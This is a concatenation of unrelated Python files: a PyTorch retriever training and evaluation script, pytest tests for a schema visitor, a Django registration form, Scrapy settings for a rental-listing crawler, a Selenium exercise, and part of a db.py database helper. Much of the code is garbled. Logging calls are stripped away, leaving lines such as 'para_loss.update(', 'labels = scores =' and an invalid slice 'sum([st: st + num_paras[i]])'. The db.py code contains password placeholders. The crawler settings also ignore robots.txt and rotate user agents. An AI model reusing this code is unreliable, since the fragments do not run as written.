args.optimizer) optimizer.load_state_dict(model['state_dict']['optimizer'])'Model loaded...') return ret, optimizer, word_dict, feature_dict def init_from_scratch(args, train_exs):'Initializing model from scratch') word_dict = feature_dict = None # create or get vocab word_dict = utils.build_word_dict(args, train_exs) if word_dict is not None: args.vocab_size = len(word_dict) args.embedding_dim_orig = args.embedding_dim args.word_dict = word_dict args.feature_dict = feature_dict ret = LSTMRetriever(args, word_dict, feature_dict) # -------------------------------------------------------------------------- # TRAIN/VALID LOOP # -------------------------------------------------------------------------- # train parameters = ret.get_trainable_params() optimizer = None if parameters is not None and len(parameters) > 0: if args.optimizer == 'sgd': optimizer = optim.SGD(parameters, args.learning_rate, momentum=args.momentum, weight_decay=args.weight_decay) elif args.optimizer == 'adamax': optimizer = optim.Adamax(parameters, weight_decay=args.weight_decay) elif args.optimizer == 'nag': optimizer = NAG(parameters, args.learning_rate, momentum=args.momentum, weight_decay=args.weight_decay) else: raise RuntimeError('Unsupported optimizer: %s' % args.optimizer) else: pass return ret, optimizer, word_dict, feature_dict def train_binary_classification(args, ret_model, optimizer, train_loader, verified_dev_loader=None): args.train_time = True para_loss = utils.AverageMeter() ret_model.model.train() for idx, ex in enumerate(train_loader): if ex is None: continue inputs = [e if e is None or type(e) != type(ex[0]) else Variable(e.cuda(async=True)) for e in ex[:]] ret_input = [*inputs[:4]] scores, _, _ = ret_model.score_paras(*ret_input) y_num_occurrences = Variable(ex[-2]) labels = (y_num_occurrences > 0).float() labels = labels.cuda() # BCE logits loss batch_para_loss = F.binary_cross_entropy_with_logits(scores.squeeze(1), labels) optimizer.zero_grad() batch_para_loss.backward() torch.nn.utils.clip_grad_norm(ret_model.get_trainable_params(), 2.0) optimizer.step() para_loss.update( if math.isnan(para_loss.avg): import pdb pdb.set_trace() if idx % 25 == 0 and idx > 0:'Epoch = {} | iter={}/{} | para loss = {:2.4f}'.format( stats['epoch'], idx, len(train_loader), para_loss.avg)) para_loss.reset() def eval_binary_classification(args, ret_model, corpus, dev_loader, verified_dev_loader=None, save_scores = True): total_exs = 0 args.train_time = False ret_model.model.eval() accuracy = 0.0 for idx, ex in enumerate(tqdm(dev_loader)): if ex is None: raise BrokenPipeError inputs = [e if e is None or type(e) != type(ex[0]) else Variable(e.cuda(async=True)) for e in ex[:]] ret_input = [*inputs[:4]] total_exs += ex[0].size(0) scores, _, _ = ret_model.score_paras(*ret_input) scores = F.sigmoid(scores) y_num_occurrences = Variable(ex[-2]) labels = (y_num_occurrences > 0).float() labels = scores = scores.cpu().data.numpy() scores = scores.reshape((-1)) if save_scores: for i, pid in enumerate(ex[-1]): corpus.paragraphs[pid].model_score = scores[i] scores = scores > 0.5 a = scores == labels accuracy += a.sum()'Eval accuracy = {} '.format(accuracy/total_exs)) top1 = get_topk(corpus) return top1 def print_vectors(args, para_vectors, question_vectors, corpus, train=False, test=False): all_question_vectors = [] all_para_vectors = [] qid2idx = {} cum_num_lens = [] all_correct_ans = {} cum_num_len = 0 for question_i, qid in enumerate(corpus.questions): labels = [] all_question_vectors.append(question_vectors[qid]) qid2idx[qid] = question_i cum_num_len += len(corpus.questions[qid].pids) cum_num_lens.append(cum_num_len) for para_i, pid in enumerate(corpus.questions[qid].pids): if corpus.paragraphs[pid].ans_occurance > 0: labels.append(para_i) all_para_vectors.append(para_vectors[pid]) all_correct_ans[qid] = labels all_para_vectors = np.stack(all_para_vectors) all_question_vectors = np.stack(all_question_vectors) assert all_para_vectors.shape[0] == cum_num_lens[-1] assert all_question_vectors.shape[0] == len(cum_num_lens) assert all_question_vectors.shape[0] == len(qid2idx) assert all_question_vectors.shape[0] == len(all_correct_ans) ## saving code if train: OUT_DIR = os.path.join(args.save_dir, args.src, args.domain, "train/") else: if args.is_test == 0: OUT_DIR = os.path.join(args.save_dir, args.src, args.domain, "dev/") else: OUT_DIR = os.path.join(args.save_dir, args.src, args.domain, "test/")"Printing vectors at {}".format(OUT_DIR)) if not os.path.exists(OUT_DIR): os.makedirs(OUT_DIR) else: shutil.rmtree(OUT_DIR, ignore_errors=True) os.makedirs(OUT_DIR) json.dump(qid2idx, open(OUT_DIR + 'map.json', 'w')) json.dump(all_correct_ans, open(OUT_DIR + 'correct_paras.json', 'w')) all_cumlen = np.array(cum_num_lens) + "document", all_para_vectors) + "question", all_question_vectors) + "all_cumlen", cum_num_lens) def save_vectors(args, ret_model, corpus, data_loader, verified_dev_loader=None, save_scores = True, train=False, test=False): total_exs = 0 args.train_time = False ret_model.model.eval() para_vectors = {} question_vectors = {} for idx, ex in enumerate(tqdm(data_loader)): if ex is None: raise BrokenPipeError inputs = [e if e is None or type(e) != type(ex[0]) else Variable(e.cuda(async=True)) for e in ex[:]] ret_input = [*inputs[:4]] total_exs += ex[0].size(0) scores, doc, ques = ret_model.score_paras(*ret_input) scores = scores.cpu().data.numpy() scores = scores.reshape((-1)) if save_scores: for i, pid in enumerate(ex[-1]): para_vectors[pid] = doc[i] for i, qid in enumerate([corpus.paragraphs[pid].qid for pid in ex[-1]]): if qid not in question_vectors: question_vectors[qid] = ques[i] for i, pid in enumerate(ex[-1]): corpus.paragraphs[pid].model_score = scores[i] get_topk(corpus) print_vectors(args, para_vectors, question_vectors, corpus, train, test) def get_topk(corpus): top1 = 0 top3 = 0 top5 = 0 for qid in corpus.questions: para_scores = [(corpus.paragraphs[pid].model_score,corpus.paragraphs[pid].ans_occurance ) for pid in corpus.questions[qid].pids] sorted_para_scores = sorted(para_scores, key=lambda x: x[0], reverse=True) if sorted_para_scores[0][1] > 0: top1 += 1 if sum([ans[1] for ans in sorted_para_scores[:3]]) > 0: top3 += 1 if sum([ans[1] for ans in sorted_para_scores[:5]]) > 0: top5 += 1 top1 = top1/len(corpus.questions) top3 = top3/len(corpus.questions) top5 = top5/len(corpus.questions)'top1 = {}, top3 = {}, top5 = {} '.format(top1, top3 ,top5 )) return top1 def get_topk_tfidf(corpus): top1 = 0 top3 = 0 top5 = 0 for qid in corpus.questions: para_scores = [(corpus.paragraphs[pid].tfidf_score, corpus.paragraphs[pid].ans_occurance) for pid in corpus.questions[qid].pids] sorted_para_scores = sorted(para_scores, key=lambda x: x[0]) # import pdb # pdb.set_trace() if sorted_para_scores[0][1] > 0: top1 += 1 if sum([ans[1] for ans in sorted_para_scores[:3]]) > 0: top3 += 1 if sum([ans[1] for ans in sorted_para_scores[:5]]) > 0: top5 += 1 'top1 = {}, top3 = {}, top5 = {} '.format(top1 / len(corpus.questions), top3 / len(corpus.questions), top5 / len(corpus.questions))) def run_predictions(args, data_loader, model, eval_on_train_set=False): args.train_time = False top_1 = 0 top_3 = 0 top_5 = 0 total_num_questions = 0 map_counter = 0 cum_num_lens = [] qid2idx = {} sum_num_paras = 0 all_correct_answers = {} for ex_counter, ex in tqdm(enumerate(data_loader)): ret_input = [*ex] y_num_occurrences = ex[3] labels = (y_num_occurrences > 0) try: topk_paras, docs, ques = model.return_topk(5,*ret_input) except RuntimeError: import pdb pdb.set_trace() num_paras = ex[1] qids = ex[-1] if args.save_para_clf_output: docs = docs.cpu().data.numpy() ques = ques.cpu().data.numpy() if ex_counter == 0: documents = docs questions = ques else: documents = np.concatenate([documents, docs]) questions = np.concatenate([questions, ques]) ### create map and cum_num_lens for i, qid in enumerate(qids): qid2idx[qid] = map_counter sum_num_paras += num_paras[i] cum_num_lens.append(sum_num_paras) all_correct_answers[map_counter] = [] st = sum(num_paras[:i]) for j in range(num_paras[i]): if labels[st+j] == 1: all_correct_answers[map_counter].append(j) ### Test case: assert len(all_correct_answers[map_counter]) == sum([st: st + num_paras[i]]) map_counter += 1 counter = 0 for q_counter, ranked_para_ids in enumerate(topk_paras): total_num_questions += 1 for i, no_paras in enumerate(ranked_para_ids): if labels[counter + no_paras ] ==1: if i <= 4: top_5 += 1 if i <= 2: top_3 += 1 if i <= 0: top_1 += 1 break counter += num_paras[q_counter]'Accuracy of para classifier when evaluated on the annotated dev set.')'top-1: {:2.4f}, top-3: {:2.4f}, top-5: {:2.4f}'.format( (top_1 * 1.0 / total_num_questions), (top_3 * 1.0 / total_num_questions), (top_5 * 1.0 / total_num_questions))) ## saving code if args.save_para_clf_output: if eval_on_train_set: OUT_DIR = "/iesl/canvas/sdhuliawala/vectors_web/train/" else: OUT_DIR = "/iesl/canvas/sdhuliawala/vectors_web/dev/" if not os.path.exists(OUT_DIR): os.mkdir(OUT_DIR) else: shutil.rmtree(OUT_DIR, ignore_errors=True) os.mkdir(OUT_DIR) #Test cases assert cum_num_lens[-1] == documents.shape[0] assert questions.shape[0] == documents.shape[0] assert len(cum_num_lens) == len(qid2idx) assert len(cum_num_lens) == len(all_correct_answers) json.dump(qid2idx, open(OUT_DIR + 'map.json', 'w')) json.dump(all_correct_answers, open(OUT_DIR + 'correct_paras.json', 'w')) all_cumlen = np.array(cum_num_lens) + "document", documents) + "question", questions) + "all_cumlen", all_cumlen) return (top_1 * 1.0 / total_num_questions), (top_3 * 1.0 / total_num_questions), (top_5 * 1.0 / total_num_questions) def save(args, model, optimizer, filename, epoch=None): params = { 'state_dict': { 'para_clf': model.state_dict(), 'optimizer': optimizer.state_dict() }, 'word_dict': args.word_dict, 'feature_dict': args.feature_dict } args.word_dict = None args.feature_dict = None params['config'] = vars(args) if epoch: params['epoch'] = epoch try:, filename) # bad hack for not saving dictionary twice args.word_dict = params['word_dict'] args.feature_dict = params['feature_dict'] except BaseException: logger.warn('[ WARN: Saving failed... continuing anyway. ]') # ------------------------------------------------------------------------------ # Main. # ------------------------------------------------------------------------------ def main(args): # PRINT CONFIG'-' * 100)'CONFIG:\n%s' % json.dumps(vars(args), indent=4, sort_keys=True)) # small can't test if args.small == 1: args.test = 0 if args.small == 1: args.train_file_name = args.train_file_name + "_small" args.dev_file_name = args.dev_file_name + "_small" if args.test == 1: args.test_file_name = args.test_file_name + "_small" args.train_file_name = args.train_file_name + ".pkl" args.dev_file_name = args.dev_file_name + ".pkl" if args.test == 1: args.test_file_name = args.test_file_name + ".pkl""Loading pickle files") fin = open(os.path.join(args.data_dir, args.src, "data", args.domain, args.train_file_name), "rb") all_train_exs = pickle.load(fin) fin.close() fin = open(os.path.join(args.data_dir, args.src, "data", args.domain, args.dev_file_name), "rb") all_dev_exs = pickle.load(fin) fin.close() if args.test == 1: fin = open(os.path.join(args.data_dir, args.src, "data", args.domain, args.test_file_name), "rb") all_test_exs = pickle.load(fin) fin.close()"Loading done!")"Num train examples {}".format(len(all_train_exs.paragraphs)))"Num dev examples {}".format(len(all_dev_exs.paragraphs))) if args.test == 1:"Num test examples {}".format(len(all_test_exs.paragraphs))) if args.pretrained is None: ret_model, optimizer, word_dict, feature_dict = init_from_scratch(args, all_train_exs) else: ret_model, optimizer, word_dict, feature_dict = init_from_checkpoint(args) # make data loader"Making data loaders...") if word_dict == None: args.word_dict = utils.build_word_dict(args, (all_train_exs, all_dev_exs)) word_dict = args.word_dict train_loader = make_data_loader(args, all_train_exs, train_time=False) if args.eval_only else make_data_loader(args, all_train_exs, train_time=True) dev_loader = make_data_loader(args, all_dev_exs) if args.test: test_loader = make_data_loader(args, all_test_exs) if args.eval_only:"Saving dev paragraph vectors") save_vectors(args, ret_model, all_dev_exs, dev_loader, verified_dev_loader=None)"Saving train paragraph vectors") save_vectors(args, ret_model, all_train_exs, train_loader, verified_dev_loader=None, train=True) if args.test: args.is_test = 1"Saving test paragraph vectors") save_vectors(args, ret_model, all_test_exs, test_loader, verified_dev_loader=None) else: get_topk_tfidf(all_dev_exs) for epoch in range(args.num_epochs): stats['epoch'] = epoch train_binary_classification(args, ret_model, optimizer, train_loader, verified_dev_loader=None)'checkpointing model at {}'.format(args.model_file)) ## check pointing## save(args, ret_model.model, optimizer, args.model_file+".ckpt", epoch=stats['epoch'])"Evaluating on the full dev set....") top1 = eval_binary_classification(args, ret_model, all_dev_exs, dev_loader, verified_dev_loader=None) if stats['best_acc'] < top1: stats['best_acc'] = top1'Best accuracy {}'.format(stats['best_acc']))'Saving model at {}'.format(args.model_file))"Logs saved at {}".format(args.log_file)) save(args, ret_model.model, optimizer, args.model_file, epoch=stats['epoch']) if __name__ == '__main__': # MODEL'-' * 100) # Parse cmdline args and setup environment args = config.get_args() # Set cuda args.cuda = not args.no_cuda and torch.cuda.is_available() if args.cuda: torch.cuda.set_device(args.gpu) # Set random state np.random.seed(args.random_seed) torch.manual_seed(args.random_seed) if args.cuda: torch.cuda.manual_seed(args.random_seed) # Set logging logger.setLevel(logging.INFO) fmt = logging.Formatter('%(asctime)s: %(message)s', '%m/%d/%Y %I:%M:%S %p') console = logging.StreamHandler() console.setFormatter(fmt) logger.addHandler(console) if args.log_file: if args.checkpoint: logfile = logging.FileHandler(args.log_file, 'a') else: logfile = logging.FileHandler(args.log_file, 'w') logfile.setFormatter(fmt) logger.addHandler(logfile)'[ COMMAND: %s ]' % ' '.join(sys.argv)) # Run! main(args)
<reponame>code-review-doctor/orchestra def load(workflow_version): """ Dummy loading function. """ pass
import pytest from align.schema.types import BaseModel, Optional, List, Dict from align.schema.visitor import Visitor, Transformer, cache @pytest.fixture def dummy(): class DummyModel(BaseModel): arg1: str arg2: Optional[str] arg3: List[str] arg4: List[Optional[str]] arg5: Dict[str, str] arg6: Dict[str, Optional[str]] arg7: "Optional[DummyModel]" arg8: "Optional[List[DummyModel]]" DummyModel.update_forward_refs() base = DummyModel( arg1 = 'arg1', arg3 = ['arg3_1', 'arg3_2'], arg4 = [], arg5 = {'arg5_k': 'arg5_v'}, arg6 = {'arg6_k': None} ) dummy = DummyModel( arg1 = 'arg1', arg3 = ['arg3_1', 'arg3_2'], arg4 = [], arg5 = {'arg5_k': 'arg5_v'}, arg6 = {'arg6_k': None}, arg7 = base, arg8 = [base, base] ) return dummy def test_visitor_no_output(dummy): assert Visitor().visit(dummy) == [] def test_visitor_raw_output(dummy): class StrValVisitor(Visitor): def visit_str(self, node): return node assert StrValVisitor().visit(dummy) == [ 'arg1', 'arg3_1', 'arg3_2', 'arg5_v', 'arg1', 'arg3_1', 'arg3_2', 'arg5_v', 'arg1', 'arg3_1', 'arg3_2', 'arg5_v', 'arg1', 'arg3_1', 'arg3_2', 'arg5_v', ] def test_visitor_processed_output(dummy): class DummyCounter(Visitor): '''Simply counts the number of times the dummy class is encountered''' def visit_DummyModel(self, node): return sum(self.generic_visit(node)) + 1 assert DummyCounter().visit(dummy) == 4 def test_transformer_no_visitor(dummy): assert Transformer().visit(dummy.arg1) is dummy.arg1 assert Transformer().visit(dummy.arg2) is dummy.arg2 assert Transformer().visit(dummy.arg3) is dummy.arg3 assert Transformer().visit(dummy.arg4) is dummy.arg4 assert Transformer().visit(dummy.arg5) is dummy.arg5 assert Transformer().visit(dummy.arg6) is dummy.arg6 assert Transformer().visit(dummy.arg7) is dummy.arg7 assert Transformer().visit(dummy.arg8) is dummy.arg8 assert Transformer().visit(dummy) is dummy def test_transformer_string_visitor(dummy): class AddStringPrefix(Transformer): def visit_str(self, node): return 'prefix_' + node transformed = AddStringPrefix().visit(dummy) assert isinstance(transformed, dummy.__class__) # String in subtree assert transformed.arg1 == 'prefix_arg1' assert transformed.arg1 is not dummy.arg1 # No string in subtree assert transformed.arg2 == None assert transformed.arg2 is dummy.arg2 # String in subtree assert transformed.arg3 == ['prefix_arg3_1', 'prefix_arg3_2'] assert transformed.arg3 is not dummy.arg3 # No string in subtree assert transformed.arg4 == [] assert transformed.arg4 is dummy.arg4, f'old:({id(dummy.arg4)}, {dummy.arg4}), new:({id(transformed.arg4)}, {transformed.arg4})' # String in subtree assert transformed.arg5 == {'arg5_k': 'prefix_arg5_v'} assert transformed.arg5 is not dummy.arg5 # No string in subtree assert transformed.arg6 == {'arg6_k': None} assert transformed.arg6 is dummy.arg6 # Expected result for arg7 and arg8 basedict = {'arg1': 'prefix_arg1', 'arg2': None, 'arg3': ['prefix_arg3_1', 'prefix_arg3_2'], 'arg4': [], 'arg5': {'arg5_k': 'prefix_arg5_v'}, 'arg6': {'arg6_k': None}, 'arg7': None, 'arg8': None} # String in subtree assert transformed.arg7 == basedict assert transformed.arg7 is not dummy.arg7 # String in subtree assert transformed.arg8 == [basedict, basedict] assert transformed.arg8 is not dummy.arg8 # Ensure cache is working for generic_visitor assert transformed.arg7 is transformed.arg8[0] assert transformed.arg8[0] is transformed.arg8[1] def test_cache(dummy): class UncachedTransformer(Transformer): def visit_DummyModel(self, node): if not hasattr(self, 'top'): = node return self.generic_visit(node) else: return node.copy() control = UncachedTransformer().visit(dummy) assert control.arg7 is not control.arg8[0] assert control.arg8[0] is not control.arg8[1] class CachedTransformer(Transformer): @cache # DO THIS FOR MOST VISITORS def visit_DummyModel(self, node): if not hasattr(self, 'top'): = node return self.generic_visit(node) else: return node.copy() transformed = CachedTransformer().visit(dummy) assert transformed.arg7 is transformed.arg8[0] assert transformed.arg8[0] is transformed.arg8[1]
<filename>djangoerp/registration/ #!/usr/bin/env python # -*- coding: utf-8 -*- from __future__ import unicode_literals """This file is part of the django ERP project. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ __author__ = '<NAME> <<EMAIL>>' __copyright__ = 'Copyright (c) 2013-2015, django ERP Team' __version__ = '0.0.5' from django import forms from django.utils.safestring import mark_safe from django.utils.translation import ugettext as _ from djangoerp.core.forms.auth import UserForm class UserRegistrationForm(UserForm): """Form for user registration. """ def __init__(self, *args, **kwargs): super(UserRegistrationForm, self).__init__(*args, **kwargs) # Improved security. if hasattr(self.fields, 'is_admin'): self.fields.pop('is_admin') if hasattr(self.fields, 'is_staff'): self.fields.pop('is_staff') if hasattr(self.fields, 'is_active'): self.fields.pop('is_active') if hasattr(self.fields, 'is_superuser'): self.fields.pop('is_superuser') if hasattr(self.fields, 'groups'): self.fields.pop('groups') if hasattr(self.fields, 'user_permissions'): self.fields.pop('user_permissions')
from mpunet.logging import ScreenLogger def warn_sparse_param(logger): logger = logger or ScreenLogger sparse_err = "mpunet 0.1.3 or higher requires integer targets" \ " as opposed to one-hot encoded targets. Setting the 'sparse'" \ " parameter no longer has any effect and may not be allowed" \ " in future versions." logger.warn(sparse_err)
<gh_stars>100-1000 # -*- coding: utf-8 -*- from house_renting.spider_settings import lianjia, a58 BOT_NAME = 'house_renting' COMMANDS_MODULE = 'house_renting.commands' SPIDER_MODULES = ['house_renting.spiders'] NEWSPIDER_MODULE = 'house_renting.spiders' USER_AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 ' \ 'Safari/605.1.15 ' USER_AGENTS = ( 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; ' '.NET CLR 3.0.04506)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR ' '2.0.50727)', 'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR ' '3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; ' '.NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR ' '3.0.04506.30)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (' 'Change: 287 c9dfb30)', 'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/20070215 K-Ninja/2.1.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0', 'Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv: Gecko Fedora/ Kazehakase/0.5.6', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 ' 'Safari/535.20', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 ' 'Safari/605.1.15', 'Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52', ) ROBOTSTXT_OBEY = False DOWNLOAD_DELAY = 10 CONCURRENT_REQUESTS_PER_DOMAIN = 1 COOKIES_ENABLED = False TELNETCONSOLE_ENABLED = False DEFAULT_REQUEST_HEADERS = { 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en', } SPIDER_MIDDLEWARES = { } DOWNLOADER_MIDDLEWARES = { 'house_renting.middlewares.HouseRentingAgentMiddleware': 100, 'house_renting.middlewares.HouseRentingProxyMiddleware': 200, 'house_renting.middlewares.HouseRentingRetryMiddleware': 300, 'scrapy.downloadermiddlewares.retry.RetryMiddleware': None, 'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware': None, } ITEM_PIPELINES = { 'house_renting.pipelines.HouseRentingPipeline': 100, 'house_renting.pipelines.DuplicatesPipeline': 200, 'scrapy.pipelines.images.ImagesPipeline': 300, 'house_renting.pipelines.ESPipeline': 400, } IMAGES_STORE = '/house-renting/data/images' MEDIA_ALLOW_REDIRECTS = True # Enable and configure the AutoThrottle extension (disabled by default) # See AUTOTHROTTLE_ENABLED = True # The initial download delay AUTOTHROTTLE_START_DELAY = 10 # The maximum download delay to be set in case of high latencies AUTOTHROTTLE_MAX_DELAY = 10 # The average number of requests Scrapy should be sending in parallel to # each remote server AUTOTHROTTLE_TARGET_CONCURRENCY = 2.0 # Enable showing throttling stats for every response received: AUTOTHROTTLE_DEBUG = True DOWNLOAD_TIMEOUT = 30 RETRY_TIMES = 3 LOG_LEVEL = 'INFO' SPIDER_SETTINGS = { 'lianjia': { 'cities': lianjia.cities, 'available_cities': lianjia.available_cities, 'available_cities_map': lianjia.available_cities_map, }, '58': { 'cities': a58.cities, 'available_cities': a58.available_cities, 'available_cities_map': a58.available_cities_map, }, } # ES 节点, 可以配置多个节点(集群), 默认为 None, 不会存储到 ES ELASTIC_HOSTS = [ {'host': 'elastic', 'port': 9200}, ] REDIS_HOST = 'redis' # 默认为 None, 不会去重 REDIS_PORT = 6379 # 默认 6379
<reponame>VeirichR/curso-python-selenium<filename>codigo_das_aulas/aula_10/ from selenium.webdriver import Firefox from import WebDriverWait from import ( url_contains, url_matches ) url = '' browser = Firefox() browser.get(url) wdw = WebDriverWait(browser, 10) links = browser.find_elements_by_css_selector('.body_b a') links[1].click() wdw.until( url_contains('selenium'), ) wdw.until( url_matches('http.*live'), )
<filename>IronManFly/storage/db/ import threading import glob import gzip try: from StringIO import StringIO # Python 2.7 except: from io import StringIO # Python 3.3+ import uuid import re import os import sys from collections import defaultdict import pandas as pd import pybars from .column import Column, ColumnSet from .table import Table, TableSet from .s3 import S3 from .utils import profile_path, load_profile, load_from_json, dump_to_json from .query_templates import query_templates # attempt to import the relevant database libraries # TODO: maybe add warnings? try: import psycopg2 as pg HAS_PG = True except ImportError: HAS_PG = False try: import MySQLdb mysql_connect = MySQLdb.connect HAS_MYSQL = True except ImportError: try: import pymysql mysql_connect = pymysql.connect HAS_MYSQL = True except ImportError: HAS_MYSQL = False try: import sqlite3 as sqlite HAS_SQLITE = True except ImportError: HAS_SQLITE = False try: import pyodbc as pyo HAS_ODBC = True except ImportError: try: import pypyodbc as pyo HAS_ODBC = True except ImportError: HAS_ODBC = False try: import pymssql HAS_PYMSSQL = True except ImportError: HAS_PYMSSQL = False DBPY_PROFILE_ID = ".db.py_" S3_PROFILE_ID = ".db.py_s3_" class DB(object): """ Utility for exploring and querying a database. Parameters ---------- username: str Your username for the database password: str Your password for the database hostname: str Hostname your database is running on (i.e. "localhost", "") port: int Port the database is running on. defaults to default port for db. portgres: 5432 redshift: 5439 mysql: 3306 sqlite: n/a mssql: 1433 filename: str path to sqlite database dbname: str Name of the database schemas: list List of schemas to include. Defaults to all. profile: str Preconfigured database credentials / profile for how you like your queries exclude_system_tables: bool Whether or not to include "system" tables (the ones that the database needs in order to operate). This includes things like schema definitions. Most of you probably don't need this, but if you're a db admin you might actually want to query the system tables. limit: int, None Default number of records to return in a query. This is used by the DB.query method. You can override it by adding limit={X} to the `query` method, or by passing an argument to `DB()`. None indicates that there will be no limit (That's right, you'll be limitless. Bradley Cooper style.) keys_per_column: int, None Default number of keys to display in the foreign and reference keys. This is used to control the rendering of PrettyTable a bit. None means that you'll have verrrrrrrry wide columns in some cases. driver: str, None Driver for mssql/pyodbc connections. Examples -------- db = DB(dbname="AdventureWorks2012", dbtype="mssql", driver="{FreeTDS}") from db import DB try: __import__('imp').find_module('psycopg2') db = DB(username="kermit", password="<PASSWORD>", hostname="", port=5432, dbname="muppets", dbtype="postgres") db = DB(username="dev", hostname="localhost", port=5432, dbname="devdb", dbtype="postgres") db = DB(username="fozzybear", password="<PASSWORD>", hostname="ec2.523.24.131", port=5432, dbname="muppets_redshift", dbtype="redshift") except ImportError: pass try: __import__('imp').find_module('pymysql') db = DB(username="root", hostname="localhost", dbname="employees", dbtype="mysql") db = DB(filename="/path/to/mydb.sqlite", dbtype="sqlite") except ImportError: pass """ def __init__(self, username=None, password=<PASSWORD>, hostname="localhost", port=None, filename=None, dbname=None, dbtype=None, schemas=None, profile="default", exclude_system_tables=True, limit=1000, keys_per_column=None, driver=None, cache=False): if port is None: if dbtype=="postgres": port = 5432 elif dbtype=="redshift": port = 5439 elif dbtype=="mysql": port = 3306 elif dbtype=="sqlite": port = None elif dbtype=="mssql": port = 1433 elif profile is not None: pass else: raise Exception("Database type not specified! Must select one of: postgres, sqlite, mysql, mssql, or redshift") self._use_cache = cache if dbtype not in ("sqlite", "mssql") and username is None: self.load_credentials(profile) if cache: self._metadata_cache = self.load_metadata(profile) elif dbtype=="sqlite" and filename is None: self.load_credentials(profile) if cache: self._metadata_cache = self.load_metadata(profile) else: self.username = username self.password = password self.hostname = hostname self.port = port self.filename = filename self.dbname = dbname self.dbtype = dbtype self.schemas = schemas self.limit = limit self.keys_per_column = keys_per_column self.driver = driver if self.dbtype is None: raise Exception("Database type not specified! Must select one of: postgres, sqlite, mysql, mssql, or redshift") self._query_templates = query_templates.get(self.dbtype).queries if self.dbtype=="postgres" or self.dbtype=="redshift": if not HAS_PG: raise Exception("Couldn't find psycopg2 library. Please ensure it is installed") self.con = pg.connect(user=self.username, password=self.password, host=self.hostname, port=self.port, dbname=self.dbname) self.con.autocommit = True self.cur = self.con.cursor() elif self.dbtype=="sqlite": if not HAS_SQLITE: raise Exception("Couldn't find sqlite library. Please ensure it is installed") self.con = sqlite.connect(self.filename) self.cur = self.con.cursor() self._create_sqlite_metatable() elif self.dbtype=="mysql": if not HAS_MYSQL: raise Exception("Couldn't find MySQLdb or pymysql library. Please ensure it is installed") creds = {} for arg in ["username", "password", "hostname", "port", "dbname"]: if getattr(self, arg): value = getattr(self, arg) if arg=="username": arg = "user" elif arg=="password": arg = "<PASSWORD>" elif arg=="dbname": arg = "db" elif arg=="hostname": arg = "host" creds[arg] = value self.con = mysql_connect(**creds) self.con.autocommit(True) self.cur = self.con.cursor() elif self.dbtype=="mssql": if not HAS_ODBC and not HAS_PYMSSQL: raise Exception("Couldn't find pyodbc or pymssql libraries. Please ensure one of them is installed") if HAS_ODBC: base_con = "Driver={driver};Server={server};Database={database};".format( driver=self.driver or "SQL Server", server=self.hostname or "localhost", database=self.dbname or '' ) conn_str = ((self.username and self.password) and "{}{}".format( base_con, "User Id={username};Password={password};".format( username=self.username, password=self.password ) ) or "{}{}".format(base_con, "Trusted_Connection=Yes;")) try: self.con = pyo.connect(conn_str) self.cur = self.con.cursor() except: self.con = pyo.connect( driver=self.driver or "SQL Server", server=self.hostname or "localhost", port=self.port, database=self.dbname or '', uid=self.username, pwd=<PASSWORD>) self.cur = self.con.cursor() elif HAS_PYMSSQL: if '\\' in self.hostname: hostname = self.hostname elif hasattr(self, 'port'): hostname = '{0}:{1}'.format(self.hostname, self.port) else: hostname = self.hostname self.con = pymssql.connect(host=hostname, user=self.username, password=<PASSWORD>, database=self.dbname) self.cur = self.con.cursor() self._tables = TableSet([]) self._exclude_system_tables = exclude_system_tables self.handlebars = pybars.Compiler() @property def 